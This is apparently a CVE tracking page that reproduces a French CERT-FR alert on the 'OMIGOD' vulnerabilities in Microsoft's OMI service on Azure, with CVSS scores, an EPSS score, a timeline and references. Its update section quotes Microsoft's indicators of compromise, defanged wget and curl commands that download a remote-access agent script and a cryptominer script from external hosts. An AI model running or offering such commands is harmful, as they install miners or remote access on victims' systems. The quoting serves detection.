CVE-2021-38648
<strong>\[Version du 20 septembre 2021\]</strong> <span class="mx_MTextBody mx_EventTile_content"><span class="mx_EventTile_body" dir="auto">Le 18 septembre Microsoft a publié un article afin d'expliquer comment Azure Sentinel peut aider à la recherche d'une compromission notamment l'exploitation des vulnérabilités OMIGOD \[4\]. De plus, à cette occasion, les marqueurs suivants, qui correspondent à des traces liées à une tentative d'exploitation, ont été proposés par Microsoft : </span></span> - <span class="mx_MTextBody mx_EventTile_content"><span class="mx_EventTile_body" dir="auto">wget https://www\[.\]dwservice\[.\]net/download/dwagent_generic\[.\]sh -O dwagent_generic.sh</span></span> - <span class="mx_MTextBody mx_EventTile_content"><span class="mx_EventTile_body" dir="auto">echo curl https://www\[.\]dwservice\[.\]net/download/dwagent_generic\[.\]sh --output dw.sh \> go.sh</span></span> - <span class="mx_MTextBody mx_EventTile_content"><span class="mx_EventTile_body" dir="auto">curl -fSsL http://104\[.\]168\[.\]213\[.\]31:55879/coinlinux/runMiner\[.\]sh</span></span> <strong>\[Version initiale\]</strong> Le 14 septembre 2021, une équipe de chercheurs en vulnérabilités a découvert quatre vulnérabilités dans Microsoft Azure, la plateforme cloud de Microsoft \[1\]. Ces vulnérabilités sont situées au sein du service OMI, lequel est déployé dans l'écosystème Azure. Ces vulnérabilités ont été regroupées sous l’appellation de « *OMIGOD* ». Le service OMI est le pendant open-source pour la famille de systèmes d'exploitation de type Linux ou Unix de WMI (Windows Management Infrastructure) et permet la gestion des configurations dans des environnements distants et locaux. En particulier, la vulnérabilité immatriculée CVE-2021-38647 permet à un attaquant non authentifié de réaliser une exécution de code arbitraire avec les privilèges de l'utilisateur *root*. Elle impacte uniquement les entités utilisant les solutions de gestion Linux (*On-Premises* SCOM, Azure Automation State Configuration ou Azure Desired State Configuration extension) lorsque la gestion à distance est activée. Pour des besoins de gestion à distance, il est possible que les ports associés à OMI (5986 / 5985 / 1270) soient accessibles depuis Internet. Dans ce cas, la vulnérabilité peut être exploitée afin d'obtenir un accès initial à un environnement Azure pour ensuite pouvoir se déplacer latéralement au sein du système d'information, en tirant notamment parti des trois autres vulnérabilités, qui permettent une élévation de privilèges locale. Dans le cadre de son Patch Tuesday, en date du 14 septembre 2021 \[5\], Microsoft a ainsi mis à disposition un correctif pour ces quatre vulnérabilités : - CVE-2021-38647 : Avec un score CVSSv3 à 9.8 et permettant à un attaquant de pouvoir exécuter du code arbitraire à distance ; - CVE-2021-38648 : Avec un score CVSSv3 à 7.8 et permettant à un attaquant de pouvoir réaliser une élévation de privilèges ; - CVE-2021-38645 : Avec un score CVSSv3 à 7.8 et permettant à un attaquant de pouvoir réaliser une élévation de privilèges ; - CVE-2021-38649 : Avec un score CVSSv3 à 7.0 et permettant à un attaquant de pouvoir réaliser une élévation de privilèges <div markdown="1"> <div markdown="1"> <strong>Des codes d'exploitation sont publiquement disponibles sur Internet pour la CVE-2021-38647</strong>, ce qui signifie que l’exploitation de cette vulnérabilité est imminente ou déjà en cours. </div> <div markdown="1"> </div> </div>
EPSS 38.22% · 97.3th percentile
Risk Scores
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Microsoft | Azure |
Timeline
- Sep 15, 2021 CVE Published
- Sep 16, 2021 EPSS Score
- Nov 3, 2021 CISA KEV Added
- Nov 10, 2021 PoC Published
- Nov 10, 2021 EPSS Score
- Nov 12, 2021 EPSS Score
- Jan 6, 2022 EPSS Score
- Feb 4, 2022 EPSS Score
- Apr 1, 2022 EPSS Score
- Jun 30, 2022 EPSS Score
- Aug 28, 2022 EPSS Score
- Dec 21, 2022 EPSS Score
References
- https://cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-020/ advisory
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38648 advisory
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38649 advisory
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38645 advisory
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647 advisory